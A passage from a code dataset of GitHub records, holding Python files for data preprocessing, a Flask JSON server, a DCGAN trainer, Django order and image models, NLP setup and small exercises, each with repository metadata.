"tensorflow.reduce_mean", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "33759605774", "text": "import math\nimport pandas as pd\nimport os\nimport glob\nimport time\nimport config as cfg\nimport warnings\n\n\ndef get_Event_code(path):\n #Get the event code translated for further analyses\n #65 = SelfStim ; 66 = CtrlStim ; 67 = SelfRest ; 68 = CtrlRest ; 69 = SelfSoc ; 70 = CtrlSoc\n\n if '_A_' in path:\n code = 65\n if '_B_' in path:\n code = 66\n if '_C_' in path:\n code = 67\n if '_D_' in path:\n code = 68\n if '_E_' in path:\n code = 69\n if '_F_' in path:\n code = 70\n return code\n\ndef adapt_csv_format(label, normalize_scales=True, write=True):\n\n ## Allow to have a new csv table adapted for deep learning analysis with rawest datas (i.e. positions x/y/z).\n ## The format is the same as diff_module files that are commonly used in the project.\n ## Posibility to choose if we want to classify by situations or subjective scales with argument \"label\"\n\n start_time = time.time()\n directory = cfg.DL_CSV_output_path\n os.chdir(directory)\n\n files = []\n subjects = []\n data = {}\n\n #Get individual files to concatenate it in a single table\n for csv in glob.glob('*x_y.csv'):\n files.append(csv)\n for file in files:\n subjects.append(file.split('_')[0])\n data[file.split('_')[0]] = pd.read_csv(directory + file, sep=',')\n\n #Add column \"Subject\" with sub names to corresponding values, normalize scales between [0, 1]\n for sub in subjects:\n data[sub]['Subject'] = sub\n for col in data[sub][['Emotion', 'Presence']]:\n if normalize_scales == True:\n data[sub][col] = (data[sub][col] - data[sub][col].min()) / (data[sub][col].max() - data[sub][col].min())\n print(\"Data transformation\")\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n Global_csv = pd.concat(data, ignore_index=True)\n\n\n #Replace \"labels\" columns at the beginning of the table\n moving_columns = Global_csv.pop('EventCode')\n Global_csv.insert(0, 'EventCode', moving_columns)\n moving_columns = Global_csv.pop('Subject')\n Global_csv.insert(0, 'Subject', moving_columns)\n moving_columns = Global_csv.pop('Presence')\n Global_csv.insert(2, 'Presence', moving_columns)\n moving_columns = Global_csv.pop('Emotion')\n Global_csv.insert(2, 'Emotion', moving_columns)\n\n #Rename 'EventCode' by 'Condition'\n Global_csv = Global_csv.rename({'EventCode': 'Condition'}, axis=1)\n\n #Choose columns for labelisation, 'Both' = Condition + Subjective scales, 'Condition' = Condition only, 'EmotionOnly' = Only emotional values, this was used in the paper 'Subjectivity' = Subjectives scales only\n if label == 'Both':\n print('Label choice : Both')\n elif label == 'Condition':\n Global_csv = Global_csv.drop(columns=['Presence', 'Emotion'])\n print('Label choice : Condition')\n elif label == 'EmotionOnly':\n Global_csv = Global_csv.drop(columns=['Presence'])\n elif label == 'Subjectivity':\n Global_csv = Global_csv.drop(columns=['Condition'])\n print('Label choice : Subjectivity')\n\n #Write the table in a given folder\n if write == True:\n Global_csv.to_csv(cfg.DL_CSV_output_path + '/' + 'All_Subs_Positions.csv',\n index=False, header=True)\n return Global_csv\n\n\ndef module_calcul(df, write=True):\n\n ###Function that calculate euclidian distances of every features at every frame (concatenation of pose x/y to\n ###obtain only 1 column pose)\n\n print(\"Data table : \", df)\n\n warnings.simplefilter(action='ignore', category=FutureWarning)\n\n #Create a list then a df with new columns names to insert modules\n Modules = []\n\n for col in df.columns:\n if 'x' in col:\n Modules.insert(len(df.columns), col.replace('x', ''))\n elif 'AU' in col:\n Modules.insert(len(df.columns), col)\n\n Modules_csv = pd.DataFrame(columns=Modules)\n\n\n #Module (Euclidian distances) calculation\n print(\"Euclidian distances calculation, it may take a while (several hours). Time for a coffee break well deserved.\")\n for i in range(len(df)):\n temp = []\n for col in Modules_csv.columns:\n if col[0] == '_':\n temp.append(math.sqrt((df['x' + col][i]**2) + (df['y' + col][i]**2)))\n elif 'AU' in col:\n temp.append(df[col][i])\n else:\n temp.append(math.sqrt((df[col + 'x'][i] ** 2) + (df[col + 'y'][i] ** 2)))\n new_line = pd.Series(temp, index=Modules_csv.columns)\n Modules_csv = Modules_csv.append(new_line, ignore_index=True)\n\n #Add and replace \"labels\" columns\n #columns_label = df.iloc[:,:4]\n columns_label = df.iloc[:,:3]\n\n Modules_csv = pd.concat([Modules_csv,columns_label], axis=1)\n\n moving_columns = Modules_csv.pop('Condition')\n Modules_csv.insert(0, 'Condition', moving_columns)\n moving_columns = Modules_csv.pop('Subject')\n Modules_csv.insert(0, 'Subject', moving_columns)\n #moving_columns = Modules_csv.pop('Presence')\n #Modules_csv.insert(2, 'Presence', moving_columns)\n moving_columns = Modules_csv.pop('Emotion')\n Modules_csv.insert(2, 'Emotion', moving_columns)\n\n print(Modules_csv)\n\n #Write the table in a given folder\n if write == True:\n Modules_csv.to_csv(cfg.DL_CSV_output_path + '/' + 'All_Subs_Modules.csv',\n index=False, header=True)\n\n return Modules_csv\n\ndef diff_module_calcul(module_df, write=True):\n\n ###Function that calculate differences of modules obtained, i.e. module x - module x-1 where x is a frame (= a line\n ###in the table)\n\n warnings.simplefilter(action='ignore', category=FutureWarning)\n\n #Create a empty df with same columns name to insert diff modules\n Diff_Modules = pd.DataFrame(columns=module_df.columns)\n #Diff_Modules = Diff_Modules.drop(['Subject', 'Emotion', 'Presence'], axis=1)\n Diff_Modules = Diff_Modules.drop(['Subject', 'Emotion'], axis=1)\n\n #Diff modules calculation\n print(\"Euclidian distances differences calculation, it may take a while (several hours)\")\n for i in range (1,len(module_df)):\n temp = [module_df['Condition'][i]]\n for col in module_df.columns[3::]:\n if 'AU' in col:\n temp.append(module_df[col][i])\n else:\n temp.append(abs(module_df[col][i] - module_df[col][i-1]))\n new_line = pd.Series(temp, index=Diff_Modules.columns)\n Diff_Modules = Diff_Modules.append(new_line, ignore_index=True)\n\n #Add and replace \"labels\" columns\n #columns_label = module_df[['Subject', 'Emotion', 'Presence']].iloc[1:,:]\n columns_label = module_df[['Subject', 'Emotion']].iloc[1:, :]\n Diff_Modules = pd.concat([Diff_Modules, columns_label],axis=1)\n\n moving_columns = Diff_Modules.pop('Subject')\n Diff_Modules.insert(0, 'Subject', moving_columns)\n #moving_columns = Diff_Modules.pop('Presence')\n #Diff_Modules.insert(2, 'Presence', moving_columns)\n moving_columns = Diff_Modules.pop('Emotion')\n Diff_Modules.insert(2, 'Emotion', moving_columns)\n\n #Diff_Modules[['Subject', 'Emotion', 'Presence']] = Diff_Modules[['Subject', 'Emotion', 'Presence']].shift(-1)\n Diff_Modules[['Subject', 'Emotion']] = Diff_Modules[['Subject', 'Emotion']].shift(-1)\n Diff_Modules = Diff_Modules[:-1]\n\n print(Diff_Modules)\n\n #Write the table in a given folder\n if write == True:\n Diff_Modules.to_csv(cfg.DL_CSV_output_path + '/' + 'All_Subs_Diff_Modules.csv',\n index=False, header=True)\n\n return Diff_Modules", "repo_name": "crnl-lab/Tracking_behavior_IA_2023_BMichelot", "sub_path": "functions_get_csv_4_analysis.py", "file_name": "functions_get_csv_4_analysis.py", "file_ext": "py", "file_size_in_byte": 7596, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.time", "line_number": 34, "usage_type": "call"}, {"api_name": "config.DL_CSV_output_path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 36, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 57, "usage_type": "call"}, {"api_name": "config.DL_CSV_output_path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "warnings.simplefilter", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 110, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 119, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 131, "usage_type": "call"}, {"api_name": "config.DL_CSV_output_path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "warnings.simplefilter", "line_number": 156, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 159, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 172, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 178, "usage_type": "call"}, {"api_name": "config.DL_CSV_output_path", "line_number": 195, "usage_type": "attribute"}]} +{"seq_id": "4141315229", "text": "from flask import render_template, request, jsonify\n\nfrom app import *\nfrom db import *\n\n@app.route(\"/\", defaults={\"code\": None})\n@app.route(\"/\")\ndef r_index(code):\n if code is None:\n data = None\n else:\n data = load_json(code)\n\n return render_template(\"index.html\", data=data)\n\n@app.route(\"/save\", methods=[\"POST\"])\ndef r_save():\n\n data = request.json[\"data\"]\n\n code = save_json(data)\n\n return jsonify({\"code\": code})\n\nif __name__ == \"__main__\":\n app.run(\"localhost\", 1337, debug=True)\n", "repo_name": "void4/jsonserver", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 527, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "app.route", "line_number": 6, "usage_type": "call"}, {"api_name": "app.route", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 23, "usage_type": "call"}, {"api_name": "app.route", "line_number": 16, "usage_type": "call"}, {"api_name": "app.run", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "6751852442", "text": "import pyarrow.parquet as pq\nfrom pandas import DataFrame\nimport numpy as np\nfrom scipy.stats import norm\nfrom matplotlib import pyplot as plt\ndf = pq.read_table(\"ztf_000245_zg_c01_q1_dr11.parquet\").to_pandas()\nlc_table = df.loc[2] \n\nprint(lc_table) #len(mag) = 37\nmag1 = lc_table[\"mag\"]\nmag = []\nfor i in mag1:\n mag.append(i)\n\nx = mag\nx.sort()\nx_mean = np.mean(x)\nx_std = np.std(x)\npdf = norm.pdf(x, x_mean, x_std)\nplt.plot(x, pdf)\nplt.show()", "repo_name": "spacedinosaur31/Microlensing", "sub_path": "skewness_plot.py", "file_name": "skewness_plot.py", "file_ext": "py", "file_size_in_byte": 446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pyarrow.parquet.read_table", "line_number": 6, "usage_type": "call"}, {"api_name": "pyarrow.parquet", "line_number": 6, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.stats.norm.pdf", "line_number": 19, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "11333654129", "text": "from transformers import pipeline\nimport os\n\n# Function to classify bean disease\n# This function uses a pre-trained model from Hugging Face Transformers to classify images of bean leaves\n# The model has been trained to detect diseases in bean crops\n# The function takes as input the path to an image of a bean leaf and returns the predicted disease\n\ndef classify_bean_disease(image_path):\n # Check if the image file exists\n if not os.path.isfile(image_path):\n raise ValueError(f\"Image file not found: {image_path}\")\n \n # Create an image classification model\n classifier = pipeline('image-classification', model='fxmarty/resnet-tiny-beans')\n \n # Classify the image\n result = classifier(image_path)\n \n # Return the result\n return result", "repo_name": "vixuowis/Research-2309", "sub_path": "Exp-2/output/hf-eval-data-v1/f00651_classify_bean_disease.py", "file_name": "f00651_classify_bean_disease.py", "file_ext": "py", "file_size_in_byte": 774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.isfile", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "transformers.pipeline", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "39993885308", "text": "# question\n# https://leetcode.com/problems/find-pivot-index/?envType=study-plan&id=level-1\nfrom typing import List\n\n# question\n# https://leetcode.com/problems/find-pivot-index/?envType=study-plan&id=level-1\n\n\n# result: Time Limit Exceeded\nclass Solution:\n def pivotIndex(self, nums: List[int]) -> int:\n max_len = len(nums)\n for i in range(0, max_len):\n if sum(nums[:i]) == sum(nums[i + 1 :]):\n return i\n return -1\n\n\nif __name__ == \"__main__\":\n test = Solution()\n nums = [1, 7, 3, 6, 5, 6]\n print(test.pivotIndex(nums))\n", "repo_name": "usma11dia0/training_of_leet_code", "sub_path": "20221031_find_pivot_index/submit_find_pivot_index_20221031.py", "file_name": "submit_find_pivot_index_20221031.py", "file_ext": "py", "file_size_in_byte": 578, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "3551755913", "text": "# -*- coding: utf-8 -*\nfrom ckiptagger import NER, POS, WS , data_utils , construct_dictionary\nimport pandas as pd\nimport gensim\nimport pickle\nimport csv\n\n\ndef initialize():\n global ws\n ws = WS(\"./data\", disable_cuda=False)\n global pos\n pos = POS(\"./data\", disable_cuda=False)\n global ner\n ner = NER(\"./data\", disable_cuda=False)\n ckip_word_dict = {}\n with open('./train_data/ckip_word_dict.pkl', 'rb') as f:\n ckip_word_dict = pickle.load(f)\n global dictionary\n dictionary = construct_dictionary(ckip_word_dict)\n# model checkpoint \n WORDMODEL_PATH = './model/wordmodel.model'\n global wordmodel\n wordmodel = gensim.models.Word2Vec.load(WORDMODEL_PATH)\n\n global check_point\n check_point = './model/product_weight_model.pkl'\n\n global train_data_filenames\n train_data_filenames = ['product_tokens1.txt']\n\n global same_word_dict\n same_word_dict = {}\n try:\n with open('./train_data/same_word_dict.pkl', 'rb') as f:\n same_word_dict = pickle.load(f)\n except Exception as e:\n print(e)\n\n with open('./train_data/同義詞.csv', newline='') as csvFile:\n rows = csv.reader(csvFile)\n count = 0\n for row in rows:\n if count == 0:\n count += 1\n continue\n c = 0\n keyword = ''\n for word in row:\n if c == 0 or c == 1:\n c += 1\n continue\n word = word.lower()\n if c == 2 and word != '':\n c += 1\n keyword = word\n if word not in same_word_dict and word != '':\n same_word_dict[word] = keyword.lower()\n with open('./train_data/same_word_dict.pkl', 'wb') as f:\n pickle.dump(same_word_dict, f, pickle.HIGHEST_PROTOCOL)\n", "repo_name": "hongyuntw/optimize_product_search", "sub_path": "globals.py", "file_name": "globals.py", "file_ext": "py", "file_size_in_byte": 1934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "ckiptagger.WS", "line_number": 11, "usage_type": "call"}, {"api_name": "ckiptagger.POS", "line_number": 13, "usage_type": "call"}, {"api_name": "ckiptagger.NER", "line_number": 15, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "ckiptagger.construct_dictionary", "line_number": 20, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec.load", "line_number": 24, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 36, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 41, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 60, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "6952989128", "text": "import tensorflow as tf\nimport numpy as np\nimport os\nfrom scipy import ndimage\nfrom config import init_op, SummaryWriter\n\n\nclass Solver(object):\n \"\"\"Load dataset and train DCGAN\"\"\"\n \n def __init__(self, model, num_epoch=10, image_path='data/celeb_resized', model_save_path='model/', log_path='log/'):\n self.model = model\n self.num_epoch = num_epoch\n self.image_path = image_path\n self.model_save_path = model_save_path\n self.log_path = log_path\n \n # create directory if not exists\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n if not os.path.exists(model_save_path):\n os.makedirs(model_save_path)\n \n # construct the dcgan model\n model.build_model()\n \n \n def load_dataset(self, image_path):\n print ('loading image dataset..')\n image_files = os.listdir(image_path)\n images = np.array(list(map(lambda x: ndimage.imread(os.path.join(image_path, x), mode='RGB'), image_files))).astype(np.float32)\n images = images / 127.5 - 1\n print ('finished loading image dataset..!')\n return images\n \n \n def train(self):\n model=self.model\n \n #load image dataset\n data = self.load_dataset(self.image_path)\n num_iter_per_epoch = int(data.shape[0] / model.batch_size)\n \n config = tf.ConfigProto(allow_soft_placement = True)\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n # initialize parameters \n try:\n tf.global_variables_initializer().run()\n except:\n tf.initialize_all_variables().run()\n \n # tensorboard\n summary_writer = SummaryWriter(logdir=self.log_path, graph=tf.get_default_graph())\n \n for e in range(self.num_epoch):\n for i in range(num_iter_per_epoch):\n # train the discriminator\n image_batch = data[i*model.batch_size:(i+1)*model.batch_size]\n z_batch = np.random.uniform(-1, 1, size=[model.batch_size , model.dim_z])\n feed_dict = {model.images: image_batch, model.z: z_batch}\n sess.run(model.d_optimizer, feed_dict)\n \n # train the generator\n feed_dict = {model.z: z_batch}\n sess.run(model.g_optimizer, feed_dict)\n \n # train the generator twice to stabilize traininig (different from paper)\n sess.run(model.g_optimizer, feed_dict)\n \n if i % 10 == 0:\n feed_dict = {model.images: image_batch, model.z: z_batch}\n summary, d_loss, g_loss = sess.run([model.summary_op, model.d_loss, model.g_loss], feed_dict)\n summary_writer.add_summary(summary, e*num_iter_per_epoch + i)\n print ('Epoch: [%d] Step: [%d/%d] d_loss: [%.6f] g_loss: [%.6f]' %(e+1, i+1, num_iter_per_epoch, d_loss, g_loss))\n \n if i % 500 == 0: \n model.saver.save(sess, os.path.join(self.model_save_path, 'dcgan-%d' %(e+1)), global_step=i+1) \n print ('model/dcgan-%d-%d saved' %(e+1, i+1))", "repo_name": "yunjey/davian-tensorflow", "sub_path": "notebooks/week4/solver.py", "file_name": "solver.py", "file_ext": "py", "file_size_in_byte": 3408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.ndimage.imread", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.ConfigProto", "line_number": 44, "usage_type": "call"}, {"api_name": "config.gpu_options", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.initialize_all_variables", "line_number": 51, "usage_type": "call"}, {"api_name": "config.SummaryWriter", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}]} +{"seq_id": "37923480990", "text": "import time\nfrom django.db import models\nimport hashlib\n\n# Create your models here.\n\n\nclass ImageTag(models.Model):\n count = models.IntegerField(default=0)\n tag_name = models.CharField(max_length=7)\n\n def __str__(self):\n return self.tag_name\n\n\ndef hashed_bed_image_path(instance, filename):\n name, suffix = filename.split('.')\n sha1 = hashlib.sha1()\n sha1.update(name.encode('utf-8'))\n hashed = sha1.hexdigest()\n year_month_day_ = time.strftime(\"%Y/%m/%d/\", time.localtime())\n return 'bed/'+year_month_day_+hashed+'.'+suffix\n\n\nclass ImageBed(models.Model):\n image_path = models.ImageField(upload_to=hashed_bed_image_path)\n origin_name = models.CharField(max_length=20)\n\n def __str__(self):\n return self.origin_name\n\n\ndef hashed_mine_image_path(instance, filename):\n name, suffix = filename.split('.')\n sha1 = hashlib.sha1()\n sha1.update(name.encode('utf-8'))\n hashed = sha1.hexdigest()\n year_month_day_ = time.strftime(\"%Y/%m/%d/\", time.localtime())\n return 'mine/'+year_month_day_+hashed+'.'+suffix\n\n\nclass MyImage(models.Model):\n image_path = models.ImageField(upload_to=hashed_mine_image_path)\n origin_name = models.CharField(max_length=20)\n tags = models.ManyToManyField(ImageTag)\n # 1: mid school\n # 2: high school\n # 4: college\n # 8: undefined\n # 16: undefined\n # 32: undefined\n authority = models.CharField(max_length=4, default='075')\n\n class Meta:\n ordering = ['image_path']\n\n def __str__(self):\n return self.origin_name\n", "repo_name": "xiong35/MyBlog", "sub_path": "blog/upload/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1548, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.db.models.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 10, "usage_type": "name"}, {"api_name": "hashlib.sha1", "line_number": 18, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 21, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "hashlib.sha1", "line_number": 35, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 38, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 45, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "36553326977", "text": "from django.shortcuts import render, redirect, reverse\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom .models import OrderList\nfrom products.models import Services\nfrom profiles.models import UserProfile\nfrom gallery.models import Reviews\n\n# Orders page views.\n\n@login_required\ndef view_order(request):\n \"\"\" A view that renders the orders contents \"\"\"\n \n # This collects all the objects in the Reviews table by order number and puts into a flat list.\n review_true = Reviews.objects.all().values_list('order_number', flat=True)\n \n # This then collects the objects from the OrderList table and excludes any results from the Reviews table.\n ol = OrderList.objects.exclude(pk__in=review_true)\n \n # This is used for a user who isn't an employee so they can only see their own orders, expanding on the above exclude filter.\n olf = ol.filter(username=request.user)\n \n # Gets the current logged in user.\n user = UserProfile.objects.get(user=request.user)\n page = request.GET.get('page', 1)\n\n # Checks to see if the logged in user is an employee.\n if user.employee == True:\n \n paginator = Paginator(ol, 10)\n employee = True\n try:\n olpage = paginator.page(page)\n except PageNotAnInteger:\n olpage = paginator.page(1)\n except EmptyPage:\n olpage = paginator.page(paginator.num_pages)\n \n return render(request, \"orders.html\", {'orders' : olpage, 'employee' : employee})\n \n # If they aren't then they're only allowed to see their own orders.\n else:\n paginator = Paginator(olf, 5)\n employee = False\n try:\n olpage = paginator.page(page)\n except PageNotAnInteger:\n olpage = paginator.page(1)\n except EmptyPage:\n olpage = paginator.page(paginator.num_pages)\n \n return render(request, \"orders.html\", {'orders' : olf, 'employee' : employee})\n\n\n\n@login_required\ndef delete_order(request, order, user_id):\n \"\"\" Deletes a selected order \"\"\"\n current_user = request.user.username\n user = UserProfile.objects.get(user=request.user)\n order = OrderList.objects.filter(pk=order)\n \n # This checks if the logged in user is the owner of the order trying to be deleted\n # or if the user is an employee who then has the right to remove the order.\n \n if user_id == current_user or user.employee == True:\n try:\n order = OrderList.objects.filter(pk=order)\n order.delete()\n messages.success(request, \"Order has been removed.\")\n return redirect(view_order) \n except Exception as e:\n messages.error(request, \"Couldn't delete object. Reason: \" + str(e))\n return redirect(view_order)\n \n # If they're not the owner then it returns to the orders page with a message redirecting \n # them back to the orders page. \n else:\n messages.error(request, \"Couldn't delete the order, you aren't the owner.\")\n return redirect(view_order)\n \n", "repo_name": "99ron/django_milestone", "sub_path": "orders/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3229, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "gallery.models.Reviews.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "gallery.models.Reviews.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "gallery.models.Reviews", "line_number": 18, "usage_type": "name"}, {"api_name": "models.OrderList.objects.exclude", "line_number": 21, "usage_type": "call"}, {"api_name": "models.OrderList.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.OrderList", "line_number": 21, "usage_type": "name"}, {"api_name": "profiles.models.UserProfile.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "profiles.models.UserProfile.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "profiles.models.UserProfile", "line_number": 27, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 33, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 37, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 39, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 42, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 46, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 50, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 52, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 13, "usage_type": "name"}, {"api_name": "profiles.models.UserProfile.objects.get", "line_number": 63, "usage_type": "call"}, {"api_name": "profiles.models.UserProfile.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "profiles.models.UserProfile", "line_number": 63, "usage_type": "name"}, {"api_name": "models.OrderList.objects.filter", "line_number": 64, "usage_type": "call"}, {"api_name": "models.OrderList.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.OrderList", "line_number": 64, "usage_type": "name"}, {"api_name": "models.OrderList.objects.filter", "line_number": 71, "usage_type": "call"}, {"api_name": "models.OrderList.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "models.OrderList", "line_number": 71, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 73, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 74, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 76, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 76, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 77, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 83, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "18153371816", "text": "# -*- coding: utf-8 -*-\n\nprint(int(\"123\"), int(12.34), str(123), bool(\"\"), bool(-1), bool(0))\n\nvar1 = 21\nvar2 = \"12\"\nprint(isinstance(var1, (int, float)), isinstance(var2, (int, str)))\n\nimport math\nfrom functools import reduce\n#两个返回值情况\ndef move(x, y, 